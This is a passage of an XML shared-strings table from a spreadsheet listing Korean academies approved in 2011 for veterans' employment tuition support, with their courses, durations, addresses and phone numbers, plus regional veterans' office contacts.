    <t>춘천서울고시학원</t>
  </si>
  <si>
    <t>9급공무원,공무원종합</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>춘천시 효자3동 643-7
(www.seoulgosi.net)</t>
  </si>
  <si>
    <t>255-3555</t>
  </si>
  <si>
    <t>와우고시</t>
  </si>
  <si>
    <t>7급공무원
9급공무원</t>
  </si>
  <si>
    <t>http://www.wowgosi.co.kr</t>
  </si>
  <si>
    <t>1544-0942</t>
  </si>
  <si>
    <t>에듀뷰넷</t>
  </si>
  <si>
    <t>교육학</t>
  </si>
  <si>
    <t>http://www.eduview.net</t>
  </si>
  <si>
    <t>062-529-0090</t>
  </si>
  <si>
    <t>㈜보탬닷컴</t>
  </si>
  <si>
    <t>정보처리기사 필기/실기</t>
  </si>
  <si>
    <t>http://www.botemi.com
전주시 완산구 효자동3가 1409-5 2층</t>
  </si>
  <si>
    <t>정보처리산업기사 필기/실기</t>
  </si>
  <si>
    <t>사무자동화산업기사 필기/실기</t>
  </si>
  <si>
    <t>컴퓨터활용능력1급 필기/실기</t>
  </si>
  <si>
    <t>컴퓨터활용능력2급 필기/실기</t>
  </si>
  <si>
    <t>컴퓨터활용능력3급 필기</t>
  </si>
  <si>
    <t>워드프러세서1급 필기/실기</t>
  </si>
  <si>
    <t>워드프러세서2급 필기/실기</t>
  </si>
  <si>
    <t>워드프러세서3급 필기/실기</t>
  </si>
  <si>
    <t>정보처리기능사 필기/실기</t>
  </si>
  <si>
    <t>정보기기운용기능사 필기/실기</t>
  </si>
  <si>
    <t>서울북부보훈지청
(☎02-944-9215)
(fax 02-945-0333)</t>
  </si>
  <si>
    <t>수원보훈지청
(☎031-259-1726)
(fax 031-254-4441)</t>
  </si>
  <si>
    <t>창원보훈지청
(☎055-240-0115)
(fax 055-247-5153)</t>
  </si>
  <si>
    <t>광주지방보훈청
(☎062-975-6653)
(fax 062-975-6659)</t>
  </si>
  <si>
    <t>전주보훈지청
(☎063-239-4522)
(fax 063-239-4560)</t>
  </si>
  <si>
    <t>080-222-1010
(fax 063-232-9197)</t>
  </si>
  <si>
    <t>2011년도 취업수강료 지정 교육기관 (온라인)</t>
  </si>
  <si>
    <t>2011년도 취업수강료 지정 교육기관(오프라인)</t>
  </si>
  <si>
    <t>광주지방보훈청
(☎062-975-6653)
(fax 062-975-6659)</t>
  </si>
  <si>
    <t>순천보훈지청
(☎061-720-3217
(fax061-727-3005)</t>
  </si>
  <si>
    <t>목포보훈지청
(☎061-270-6816)
(fax061-277-4668)</t>
  </si>
  <si>
    <t>전주보훈지청
(☎063-239-4522)
(fax063-239-4560)</t>
  </si>
  <si>
    <t>익산보훈지청
(☎063-850-3713)
(fax063-850-3761)</t>
  </si>
  <si>
    <t>강남컴퓨터학원</t>
  </si>
  <si>
    <t>비트컴퓨터학원</t>
  </si>
  <si>
    <t>순천제일고시학원</t>
  </si>
  <si>
    <t>박문각고시학원</t>
  </si>
  <si>
    <t>김원옥어학원</t>
  </si>
  <si>
    <t>한성컴퓨터학원</t>
  </si>
  <si>
    <t>충남 천안시 동남구 신부동 466-2  4층
(http://cheonan.policecenter.co.kr/)</t>
  </si>
  <si>
    <t>대전시 서구 탄방동 591 홈플러스 탄방점 4층
(www.okeg.co.kr)</t>
  </si>
  <si>
    <t>대전시 유성구 궁동 482-1 누드캐슬 5층
(www.ulskorea.com)</t>
  </si>
  <si>
    <t>대전시 서구 둔산동  1164 프뢰벨빌딩4 층
(http://www.timettl.co.kr/)</t>
  </si>
  <si>
    <t>대전 서구 둔산동 1160 오라클빌딩 3층
(www.gmenglish.co.kr)</t>
  </si>
  <si>
    <t>대전시 서구 둔산2동 1091번지 밀레니엄프라자 5층 501호
(http://www.djcom.net)</t>
  </si>
  <si>
    <t>기관명</t>
  </si>
  <si>
    <t>교육기관명</t>
  </si>
  <si>
    <t>강의기간</t>
  </si>
  <si>
    <t>토익, 토플, 텝스</t>
  </si>
  <si>
    <t>컴활, 워드, 정보화자격증 등</t>
  </si>
  <si>
    <t>1-2개월</t>
  </si>
  <si>
    <t>순천시 연향동 1326-2 BYC 4층
(www.kncgi.co.kr)</t>
  </si>
  <si>
    <t>061-724-7724</t>
  </si>
  <si>
    <t>순천시 연향동 1329-1
(www.bitedu.co.kr)</t>
  </si>
  <si>
    <t>061-721-8410</t>
  </si>
  <si>
    <t>7,9급 및 기능직 공무원 시험</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>순천시 매곡동 38-10
(www.scjeilgosi.com)</t>
  </si>
  <si>
    <t>061-753-6141</t>
  </si>
  <si>
    <t>순천시 조례동 1720-2
(www.sunchongosi.co.kr)</t>
  </si>
  <si>
    <t>061-725-0555</t>
  </si>
  <si>
    <t>토익, 토플, 텝스</t>
  </si>
  <si>
    <t>순천시 연향동 1342-5 양천회관 3층</t>
  </si>
  <si>
    <t>061-724-0559</t>
  </si>
  <si>
    <t>여수시 문수동 82-1(3층)
(www.hansungc.co.kr)</t>
  </si>
  <si>
    <t>061-651-5694</t>
  </si>
  <si>
    <t>금강행정고시학원</t>
  </si>
  <si>
    <t>공무원</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>목포시 상동 878-1</t>
  </si>
  <si>
    <t>061-284-0234</t>
  </si>
  <si>
    <t>글로벌어학원</t>
  </si>
  <si>
    <t>영어,일본어,중국어</t>
  </si>
  <si>
    <t>목포시 상동 954</t>
  </si>
  <si>
    <t>061-284-8230</t>
  </si>
  <si>
    <t>유노우컴퓨터학원</t>
  </si>
  <si>
    <t>정보화</t>
  </si>
  <si>
    <t>목포시 연산동 신안비치1차 상가 302호</t>
  </si>
  <si>
    <t>061-274-1614</t>
  </si>
  <si>
    <t>전주행정고시학원</t>
  </si>
  <si>
    <t>9급, 경찰</t>
  </si>
  <si>
    <t>종합반(2개월)</t>
  </si>
  <si>
    <t>전주시 덕진구 진북1동 368-1</t>
  </si>
  <si>
    <t>063-276-2000
(063-276-0689)</t>
  </si>
  <si>
    <t>전주한빛고시학원</t>
  </si>
  <si>
    <t>9급행정직, 세무직
경찰, 소방직</t>
  </si>
  <si>
    <t>전주시 덕진구 덕진동1가 1276-9
삼전빌딩 2-6층</t>
  </si>
  <si>
    <t>063-251-9114
(063-251-9156)</t>
  </si>
  <si>
    <t>굿모닝컴퓨터학원</t>
  </si>
  <si>
    <t>사무자동화산업기사
정보처리기사/산업기사
컴퓨터활용능력1급
컴퓨터활용능력2급
워드 실기</t>
  </si>
  <si>
    <t>7주
12주
8주
4주
2주</t>
  </si>
  <si>
    <t>전주시 덕진구 금암1동 664-77</t>
  </si>
  <si>
    <t>063-273-3001
(063-273-3142)
(전화하고 팩스)</t>
  </si>
  <si>
    <t>아중월드컴퓨터
학원</t>
  </si>
  <si>
    <t>전주시 덕진구 인후동1가 951-1
아중마을아남아파트상가 2층</t>
  </si>
  <si>
    <t>063-243-6672</t>
  </si>
  <si>
    <t>정상어학원</t>
  </si>
  <si>
    <t>전주시 덕진구 금암동 664-46</t>
  </si>
  <si>
    <t>063-273-7667
(063-273-7669)</t>
  </si>
  <si>
    <t>익산행정고시학원</t>
  </si>
  <si>
    <t>익산시 신동 760-10 3층
(www.gosi1004.co.kr)</t>
  </si>
  <si>
    <t>063-842-5454
063-858-9020
(063-842-5447)</t>
  </si>
  <si>
    <t>황삼봉밀레니엄어학원</t>
  </si>
  <si>
    <t>메인컴퓨터학원</t>
  </si>
  <si>
    <t>사무자동화산업기사(실기)
컴퓨터활용능력1급(실기)
컴퓨터활용능력2급(실기)
워드프로세서(실기)</t>
  </si>
  <si>
    <t>063-858-0318
(063-841-9671)</t>
  </si>
  <si>
    <t>군산박문각행정고시학원</t>
  </si>
  <si>
    <t>9급,경찰공무원</t>
  </si>
  <si>
    <t>군산시 경장동 469-7
(gunsan.eduspatv.com)</t>
  </si>
  <si>
    <t>현대외국어학원</t>
  </si>
  <si>
    <t>063-462-0752
(063-463-0782)</t>
  </si>
  <si>
    <t>거성컴퓨터학원</t>
  </si>
  <si>
    <t>정보처리기사 필기,실기
사무자동화산업기사 필기, 실기
정보처리기능사 필기, 실기
컴퓨터활용능력 필기, 실기
워드프로세서 필기, 실기</t>
  </si>
  <si>
    <t>3-4개월</t>
  </si>
  <si>
    <t>군산시 명산동 14-17
(www.geosung1.co.kr)</t>
  </si>
  <si>
    <t>063-446-3040
(063-446-4010)</t>
  </si>
  <si>
    <t>2-3개월</t>
  </si>
  <si>
    <t>익산시 신동 761-18</t>
  </si>
  <si>
    <t>063-856-1505</t>
  </si>
  <si>
    <t>4-7주</t>
  </si>
  <si>
    <t>익산시 신동 761-26</t>
  </si>
  <si>
    <t>063-446-9920</t>
  </si>
  <si>
    <t>군산시 나운동 795-2 시민프라자4층</t>
  </si>
  <si>
    <t>서울남부보훈지청
(☎02-3019-2324)
(fax 02-3019-2333)</t>
  </si>
  <si>
    <t>서울북부보훈청
(☎02-944-9215)
(fax 02-945-0333)</t>
  </si>
  <si>
    <t>수원보훈지청
(☎031-259-1726)
(fax031-254-4441)</t>
  </si>
  <si>
    <t>인천보훈지청
(☎032-430-0135)
(fax032-439-6516)</t>
  </si>
  <si>
    <t>강릉보훈지청
(033-610-0605)
FAX: 033-610-0660</t>
  </si>
  <si>
    <t>부산지방보훈청
(☎051-660-6224)
(fax051-469-2135)</t>
  </si>
  <si>
    <t>울산남부행정고시학원</t>
  </si>
  <si>
    <t>7급공무원
9급공무원</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>울산 남구 신정2동 665-8
(http://www.inbgosi.com)</t>
  </si>
  <si>
    <t>052-256-2511</t>
  </si>
  <si>
    <t>울산중앙행정고시학원</t>
  </si>
  <si>
    <t>9급공무원</t>
  </si>
  <si>
    <t>울산 남구 신정2동 672-15 5층
(www.gosiup.co.kr)</t>
  </si>
  <si>
    <t>052-267-2004</t>
  </si>
  <si>
    <t>중앙경찰학원</t>
  </si>
  <si>
    <t>경찰공무원</t>
  </si>
  <si>
    <t>1개월
2개월
1년</t>
  </si>
  <si>
    <t>울산 남구 달동 589-3번지
(www.jungangpolice.co.kr)</t>
  </si>
  <si>
    <t>052-274-9112</t>
  </si>
  <si>
    <t>글로벌외국어학원</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>울산 남구 달동 1253-3 태금빌딩 6층
(www.usglobal.com)</t>
  </si>
  <si>
    <t>052-951-8282</t>
  </si>
  <si>
    <t>그랜드어학원</t>
  </si>
  <si>
    <t>울산 남구 신정2동 672-15 4층
(www.usgrand.com)</t>
  </si>
  <si>
    <t>052-271-0037</t>
  </si>
  <si>
    <t>와세다어학원</t>
  </si>
  <si>
    <t>JLPT</t>
  </si>
  <si>
    <t>4개월</t>
  </si>
  <si>
    <t>울산 남구 달동 1253-3 태금빌딩 4층
(www.uswaseda.co.kr)</t>
  </si>
  <si>
    <t>052-951-0066</t>
  </si>
  <si>
    <t>e-와세다어학원</t>
  </si>
  <si>
    <t>JPT
JLPT</t>
  </si>
  <si>
    <t>1개월
4개월</t>
  </si>
  <si>
    <t>울산 남구 신정동 1233-1 4층
(www.uswaseda.co.kr)</t>
  </si>
  <si>
    <t>052-285-0085</t>
  </si>
  <si>
    <t>강남어학원</t>
  </si>
  <si>
    <t>토익
토플
문법</t>
  </si>
  <si>
    <t>울산 남구 무거동 618-9  3층
(www.uskangnam.com)</t>
  </si>
  <si>
    <t>052-222-0502</t>
  </si>
  <si>
    <t>경남컴퓨터학원</t>
  </si>
  <si>
    <t>워드
컴활
사무자동화산업기사
정보처리기사</t>
  </si>
  <si>
    <t>울산 남구 신정2동 1220-9
(www.ulsanknam.com)</t>
  </si>
  <si>
    <t>052-265-3832</t>
  </si>
  <si>
    <t>뉴고려컴퓨터학원</t>
  </si>
  <si>
    <t>3개월
3개월
5개월
5개월</t>
  </si>
  <si>
    <t>울산 남구 신정동 1233-12
(www.newkoreacom.co.kr)</t>
  </si>
  <si>
    <t>052-267-2674</t>
  </si>
  <si>
    <t>서진컴퓨터학원</t>
  </si>
  <si>
    <t>1개월
2개월/4개월
2개월
3개월
3개월</t>
  </si>
  <si>
    <t>울산 남구 달동 1331-13 2층
(www.sjcom.net)</t>
  </si>
  <si>
    <t>052-256-0993</t>
  </si>
  <si>
    <t>퍼펙트어학원</t>
  </si>
  <si>
    <t>토익시험</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>경남 창원시 마산회원구 합성동 84-48</t>
  </si>
  <si>
    <t>055-256-2400</t>
  </si>
  <si>
    <t>중앙고시학원</t>
  </si>
  <si>
    <t>1~3개월</t>
  </si>
  <si>
    <t>경남 창원시 마산합포구 해운동 17-2</t>
  </si>
  <si>
    <t>055-221-5525</t>
  </si>
  <si>
    <t>김해행정고시학원</t>
  </si>
  <si>
    <t>경남 김해시 부원동 625-4</t>
  </si>
  <si>
    <t>055-324-7776</t>
  </si>
  <si>
    <t>에디스꼬토익,토플학원</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>경남 창원시 마산합포구 해운동 13-21</t>
  </si>
  <si>
    <t>055-246-0513</t>
  </si>
  <si>
    <t>브릿지토익전문학원</t>
  </si>
  <si>
    <t>경남 김해시 외동 1259-2</t>
  </si>
  <si>
    <t>055-333-9933</t>
  </si>
  <si>
    <t>윈컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서
컴퓨터활용능력
정보기기운용기능사
정보처리기능사
정보처리산업기사
정보처리기사
사무자동화산업기사</t>
  </si>
  <si>
    <t>1개월~5개월</t>
  </si>
  <si>
    <t>경남 김해시 외동 1187-21</t>
  </si>
  <si>
    <t>055-322-5569</t>
  </si>
  <si>
    <t>아카데미컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서
컴퓨터활용능력</t>
  </si>
  <si>
    <t>경남 거제시 신현읍 고현리 1012-1</t>
  </si>
  <si>
    <t>055-637-0087</t>
  </si>
  <si>
    <t>중앙컴퓨터학원</t>
  </si>
  <si>
    <t>사무자동화산업기사
정보처리산업기사
정보처리기능사
정보처리기사
워드프로세서
컴퓨터활용능력</t>
  </si>
  <si>
    <t>경남 창원시 성산구 상남동 45-1 성원주상가 6층 619호</t>
  </si>
  <si>
    <t>055-266-0144</t>
  </si>
  <si>
    <t>엘리트전산학원</t>
  </si>
  <si>
    <t>경남 창원시 진해구 경화동 1181-5 옥포상가 3층</t>
  </si>
  <si>
    <t>055-545-3870</t>
  </si>
  <si>
    <t>밀양컴퓨터학원</t>
  </si>
  <si>
    <t>경남 밀양시 내이동 721-4</t>
  </si>
  <si>
    <t>055-354-0977</t>
  </si>
  <si>
    <t>송기형컴퓨터학원</t>
  </si>
  <si>
    <t>경남 창원시 진해구 석동 279-6번지</t>
  </si>
  <si>
    <t>055-545-3335</t>
  </si>
  <si>
    <t>유투컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서
컴퓨터활용능력
사무자동화산업기사</t>
  </si>
  <si>
    <t>경남 밀양시 내이동 1591-1</t>
  </si>
  <si>
    <t>055-352-4747</t>
  </si>
  <si>
    <t>민병철외국어학원</t>
  </si>
  <si>
    <t>경남 창원시 의창구 용호동 73-62 정우상가7층</t>
  </si>
  <si>
    <t>055-281-0210</t>
  </si>
  <si>
    <t>정우컴퓨터전산회계학원</t>
  </si>
  <si>
    <t>경남 창원시 성산구 중앙동 89-13 키다리빌딩 701호</t>
  </si>
  <si>
    <t>055-262-1449</t>
  </si>
  <si>
    <t>경남외국어학원</t>
  </si>
  <si>
    <t>경남 창원시 마산회원구 합성1동 85-25 3층</t>
  </si>
  <si>
    <t>055-299-0050</t>
  </si>
  <si>
    <t>송기웅컴퓨터학원</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>경남 창원시 진해구 자은동 903-5</t>
  </si>
  <si>
    <t>055-547-3332</t>
  </si>
  <si>
    <t>육서당고시학원</t>
  </si>
  <si>
    <t>경찰공무원
9급공무원</t>
  </si>
  <si>
    <t>3개월
1년</t>
  </si>
  <si>
    <t>경남 창원시 마산회원구 석전동 224-1 삼성디지탈프라자 3층</t>
  </si>
  <si>
    <t>055-221-0321</t>
  </si>
  <si>
    <t>k2외국어학원</t>
  </si>
  <si>
    <t>경상남도 진주시 가좌동 492-1</t>
  </si>
  <si>
    <t>055-762-5056</t>
  </si>
  <si>
    <t>제일전산학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리(산업)기사</t>
  </si>
  <si>
    <t>경상남도 사천시,읍 평화리 157-13세화빌딩3층</t>
  </si>
  <si>
    <t>055-853-1004</t>
  </si>
  <si>
    <t>엘리트 전산학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리(산업)기사 등</t>
  </si>
  <si>
    <t>경상남도 통영시 봉평동 62-9</t>
  </si>
  <si>
    <t>055-644-7818</t>
  </si>
  <si>
    <t>3개월(필기+실기)</t>
  </si>
  <si>
    <t>경상남도 진주시 대안동 12-23</t>
  </si>
  <si>
    <t>055-745-6111</t>
  </si>
  <si>
    <t>서울IT교육센터학원</t>
  </si>
  <si>
    <t>경상남도 진주시 칠암동 381-3번지 4층</t>
  </si>
  <si>
    <t>055-753-3677</t>
  </si>
  <si>
    <t>서울IT교육센터 진주학원</t>
  </si>
  <si>
    <t>경상남도 진주시 강남동 198번지 2층</t>
  </si>
  <si>
    <t>한미전산학원</t>
  </si>
  <si>
    <t>경상남도 통영시 북신동 6-2</t>
  </si>
  <si>
    <t>055-646-1114</t>
  </si>
  <si>
    <t>메가타임어학원</t>
  </si>
  <si>
    <t>TOEIC</t>
  </si>
  <si>
    <t>경상남도 진주시 칠암동 490-8,
산업대 정문 앞 엠코아 빌딩 4층, 403호.</t>
  </si>
  <si>
    <t>055-763-4483</t>
  </si>
  <si>
    <t>대전제일고시학원</t>
  </si>
  <si>
    <t>9급공무원</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>대전시 중구 선화동 8번지
(http://www.jeil21.com)</t>
  </si>
  <si>
    <t>042) 257-8001
(fax: 251-7771)</t>
  </si>
  <si>
    <t>7급공무원</t>
  </si>
  <si>
    <t>종합반 단과</t>
  </si>
  <si>
    <t>2&amp;2</t>
  </si>
  <si>
    <t>유성제일고시학원</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>대전시 유성구 궁동 482-3
캠퍼스힐 4층
(www.okpass.com)</t>
  </si>
  <si>
    <t>042) 823-8001
(fax: 487-8505)</t>
  </si>
  <si>
    <t>소방공무원</t>
  </si>
  <si>
    <t>7.9급군무원</t>
  </si>
  <si>
    <t>임용고사</t>
  </si>
  <si>
    <t>대전한국공무원학원</t>
  </si>
  <si>
    <t>2개월
6개월
회원제</t>
  </si>
  <si>
    <t>대전시 중구 은행동 128-3번지
(http://www.hankukgosi.co.kr/)</t>
  </si>
  <si>
    <t>042) 242-1140</t>
  </si>
  <si>
    <t>대전고시학원</t>
  </si>
  <si>
    <t>대전시 서구 둔산동 1419번지
(www.tgosi.co.kr)</t>
  </si>
  <si>
    <t>042) 486-6663</t>
  </si>
  <si>
    <t>대전국민경찰학원</t>
  </si>
  <si>
    <t>경찰공무원</t>
  </si>
  <si>
    <t>2개월
3개월
회원제</t>
  </si>
  <si>
    <t xml:space="preserve">대전시중구 은행동 55-3
(www.kukminpol.co.kr) </t>
  </si>
  <si>
    <t>042) 222-9112</t>
  </si>
  <si>
    <t>대전중앙경찰학원</t>
  </si>
  <si>
    <t>대전시 중구 은행동 128-3
(http://daejeon.policecenter.co.kr)</t>
  </si>
  <si>
    <t>042) 242-9112</t>
  </si>
  <si>
    <t>천안중앙경찰학원</t>
  </si>
  <si>
    <t>042) 523-9112</t>
  </si>
  <si>
    <t>타임시사어학원</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>042) 477-0545</t>
  </si>
  <si>
    <t>텝스</t>
  </si>
  <si>
    <t>토플</t>
  </si>
  <si>
    <t>굿모닝어학원</t>
  </si>
  <si>
    <t>042) 488-6112</t>
  </si>
  <si>
    <t>JLPT</t>
  </si>
  <si>
    <t>ULS충대외국어학원</t>
  </si>
  <si>
    <t>042) 822-7400</t>
  </si>
  <si>
    <t>TEPS</t>
  </si>
  <si>
    <t>탄방이지어학원</t>
  </si>
  <si>
    <t>042) 472-2905</t>
  </si>
  <si>
    <t>오하외국어교육원</t>
  </si>
  <si>
    <t>천안 동남구 신부동 364-48
(http://www.oha.co.kr/)</t>
  </si>
  <si>
    <t>042) 553-4253</t>
  </si>
  <si>
    <t>EM어학원</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>대전시 대덕구 오정동 175-10</t>
  </si>
  <si>
    <t>042) 320-0316</t>
  </si>
  <si>
    <t xml:space="preserve"> 시사일본어학원</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>대전시 중구 은행동 65-1
(www.djsisa.com)</t>
  </si>
  <si>
    <t>042) 222-1582</t>
  </si>
  <si>
    <t>JPT</t>
  </si>
  <si>
    <t>하이미디어컴퓨터학원</t>
  </si>
  <si>
    <t>정보처리(산업)기사</t>
  </si>
  <si>
    <t>대전시 중구 선화동 8번지 3층
(http://djcom.net)</t>
  </si>
  <si>
    <t>042) 286-0008</t>
  </si>
  <si>
    <t>사무자동화산업기사</t>
  </si>
  <si>
    <t>컴퓨터활용능력1,2급</t>
  </si>
  <si>
    <t>워드프로세서 1급</t>
  </si>
  <si>
    <t>둔산하이미디어 
컴퓨터학원</t>
  </si>
  <si>
    <t>042) 273-8272</t>
  </si>
  <si>
    <t>제일컴퓨터학원</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>충남 논산시 취암동 574-4
(http://jeil2002.co.kr/)</t>
  </si>
  <si>
    <t>041) 735-6143</t>
  </si>
  <si>
    <t>예산컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서</t>
  </si>
  <si>
    <t>2-4개월</t>
  </si>
  <si>
    <t>충남 예산군 예산읍 725번지</t>
  </si>
  <si>
    <t>041-332-3254</t>
  </si>
  <si>
    <t>정보처리</t>
  </si>
  <si>
    <t>컴퓨터활용능력</t>
  </si>
  <si>
    <t>서강정보처리학원</t>
  </si>
  <si>
    <t>충남 아산시 온천2동 212-8</t>
  </si>
  <si>
    <t>041-545-2563</t>
  </si>
  <si>
    <t>사무자동화</t>
  </si>
  <si>
    <t>충남정보처리학원</t>
  </si>
  <si>
    <t>충남 홍성군 홍성읍 오관리363-2</t>
  </si>
  <si>
    <t>041-632-4528</t>
  </si>
  <si>
    <t>21세기정보처리학원</t>
  </si>
  <si>
    <t>충남 보령시 대천동 331-25</t>
  </si>
  <si>
    <t>041-931-3318</t>
  </si>
  <si>
    <t>정보기기</t>
  </si>
  <si>
    <t>세종컴퓨터학원</t>
  </si>
  <si>
    <t>충남 당진군 당진읍 읍내리 635-14</t>
  </si>
  <si>
    <t>041-356-1157</t>
  </si>
  <si>
    <t>한독컴퓨터학원</t>
  </si>
  <si>
    <t>충남 서산시 동문동 910-37</t>
  </si>
  <si>
    <t>041-665-5950</t>
  </si>
  <si>
    <t>온천정보처리학원</t>
  </si>
  <si>
    <t>충남 아산시 용화동 635</t>
  </si>
  <si>
    <t>041-533-7947</t>
  </si>
  <si>
    <t>043-295-9999</t>
  </si>
  <si>
    <t>043-287-0584</t>
  </si>
  <si>
    <t>043-250-6780</t>
  </si>
  <si>
    <t>043-262-1070</t>
  </si>
  <si>
    <t>043-274-0515</t>
  </si>
  <si>
    <t>043-266-2030</t>
  </si>
  <si>
    <t>043-274-4111</t>
  </si>
  <si>
    <t>043-291-0164</t>
  </si>
  <si>
    <t>USA어학원</t>
  </si>
  <si>
    <t>토익,토플</t>
  </si>
  <si>
    <t>매월초개강</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 분평동 1225</t>
  </si>
  <si>
    <t>잉글루 어학원</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 수곡2동 909</t>
  </si>
  <si>
    <t>씨엔티고시학원</t>
  </si>
  <si>
    <t>7,9급공무원,10급 기능직</t>
  </si>
  <si>
    <t>충북 청주시 우암동 237-13
café.daum.net/cjstudyclub</t>
  </si>
  <si>
    <t>한교고시학원</t>
  </si>
  <si>
    <t>공무원(9급,경찰,소방),교사임용</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 사창동 148-5
www.hangyo.co.kr</t>
  </si>
  <si>
    <t>한국외국어학원</t>
  </si>
  <si>
    <t>토익,토플,텝스,JPT,JLPT,HSK</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 사창동 153-1
www.hankukls.com</t>
  </si>
  <si>
    <t>청주행정고시학원</t>
  </si>
  <si>
    <t>7,9급공무원,경찰,기능직,초등임용</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 사창동 156-2
www.modupass.com</t>
  </si>
  <si>
    <t>세종컴퓨터학원</t>
  </si>
  <si>
    <t>사무자동화,컴활,워드,정보처리,정보기기운용</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 사창동 222-16
www.scjongn.com</t>
  </si>
  <si>
    <t>종로컴퓨터학원</t>
  </si>
  <si>
    <t>충북 청주시 흥덕구 수곡동 896(4층)</t>
  </si>
  <si>
    <t>충주고시학원</t>
  </si>
  <si>
    <t>충주시 충의동 365
http://www.gosiman.co.kr/</t>
  </si>
  <si>
    <t>043-852-3660</t>
  </si>
  <si>
    <t>한미컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서</t>
  </si>
  <si>
    <t>충주시 문화동 697</t>
  </si>
  <si>
    <t>043-844-5544</t>
  </si>
  <si>
    <t>정보저리기능사</t>
  </si>
  <si>
    <t>국제컴퓨터속셈학원</t>
  </si>
  <si>
    <t>제천시 장락동 642-6</t>
  </si>
  <si>
    <t>043-642-6966</t>
  </si>
  <si>
    <t>한국공무원고시학원</t>
  </si>
  <si>
    <t>7,9급 공무원
교사임용</t>
  </si>
  <si>
    <t>대구 중구 남일동 109-2 3,4,6층
(http://www.testb.co.kr)</t>
  </si>
  <si>
    <t>053-423-0066</t>
  </si>
  <si>
    <t>대구공무원학원</t>
  </si>
  <si>
    <t>7,9급공무원</t>
  </si>
  <si>
    <t>대구 중구 덕산동 126번지 흥국생명 9,10층
(http://www.surepass.co.kr)</t>
  </si>
  <si>
    <t>053-422-8778</t>
  </si>
  <si>
    <t>구평회고시학원</t>
  </si>
  <si>
    <t>교사임용</t>
  </si>
  <si>
    <t>대구 중구 남일동 36-1 미도빌딩 4층
(http://www.pestalozzi.co.kr)</t>
  </si>
  <si>
    <t>053-426-0078</t>
  </si>
  <si>
    <t>새롬고시학원</t>
  </si>
  <si>
    <t>교사임용
경찰공무원</t>
  </si>
  <si>
    <t>대구 중구 남일동 30-5 로얄빌딩 2층
(http://www.egosi.co.kr)</t>
  </si>
  <si>
    <t>053-252-7447</t>
  </si>
  <si>
    <t>대구국민경찰학원</t>
  </si>
  <si>
    <t>대구 중구 덕산동 126 흥국생명 2층
(http://www.kukminpol.co.kr)</t>
  </si>
  <si>
    <t>053-253-0112</t>
  </si>
  <si>
    <t>대구 중구 동성로3가 86-1
(http://koreapolice.co.kr)</t>
  </si>
  <si>
    <t>053-422-2312</t>
  </si>
  <si>
    <t>현대(정보.통신.전기)
고시학원</t>
  </si>
  <si>
    <t>10급기능직(운전원,사무원)</t>
  </si>
  <si>
    <t>대구 중구 북성로1가 82-2
(http://www.10gosi.com)</t>
  </si>
  <si>
    <t>053-253-0330</t>
  </si>
  <si>
    <t>헤럴드외국어학원</t>
  </si>
  <si>
    <t>토익, HSK, JPT</t>
  </si>
  <si>
    <t>대구 중구 삼덕1가 8-1 동원빌딩
(http://iherald.co.kr)</t>
  </si>
  <si>
    <t>053-423-1414</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원
대구캠퍼스</t>
  </si>
  <si>
    <t>대구 중구 남일동 109-2 제일빌딩5층
(http://www.greenart.co.kr)</t>
  </si>
  <si>
    <t>053-572-1005</t>
  </si>
  <si>
    <t>한글컴퓨터학원</t>
  </si>
  <si>
    <t>정보화과정</t>
  </si>
  <si>
    <t>대구 중구 동성로3가 16-11
(http://www.yeshangul.com)</t>
  </si>
  <si>
    <t>053-254-7686</t>
  </si>
  <si>
    <t>YBM어학원</t>
  </si>
  <si>
    <t>토익(기초,중급),기초토익종합반</t>
  </si>
  <si>
    <t>대구 중구 동성로 3가 90-1 6층
(http://www.ybmedu.com)</t>
  </si>
  <si>
    <t>053-431-0509</t>
  </si>
  <si>
    <t>실전토익(50분, 70분)</t>
  </si>
  <si>
    <t>JPT,JLPT,IBT</t>
  </si>
  <si>
    <t>청운아카데미 학원</t>
  </si>
  <si>
    <t>10급기능직</t>
  </si>
  <si>
    <t>대구 남구 대명3동 2133-5번지 4층
(http://cuacademy.hompee.com)</t>
  </si>
  <si>
    <t>053-253-6695</t>
  </si>
  <si>
    <t>JBS경찰학원</t>
  </si>
  <si>
    <t>경찰공무원(준비반)</t>
  </si>
  <si>
    <t>3~4개월</t>
  </si>
  <si>
    <t>대구 중구 봉산동 127-3 대성빌딩 11층
(http://www.jbs112.co.kr)</t>
  </si>
  <si>
    <t>053-255-0112</t>
  </si>
  <si>
    <t>시지정보처리학원</t>
  </si>
  <si>
    <t>워드,컴활,정보처리기사,사무자동화기사
정보처리기능사</t>
  </si>
  <si>
    <t>대구 신매동 567-44
(www.secoma.co.kr)</t>
  </si>
  <si>
    <t>053-792-4081~2</t>
  </si>
  <si>
    <t>이앤펀어학원</t>
  </si>
  <si>
    <t>대구 서구 내당4동 468-4</t>
  </si>
  <si>
    <t>053-564-0579
011-9576-5004</t>
  </si>
  <si>
    <t>안동보훈지청
(☎054-830-9320)
(fax 054-821-6685)</t>
  </si>
  <si>
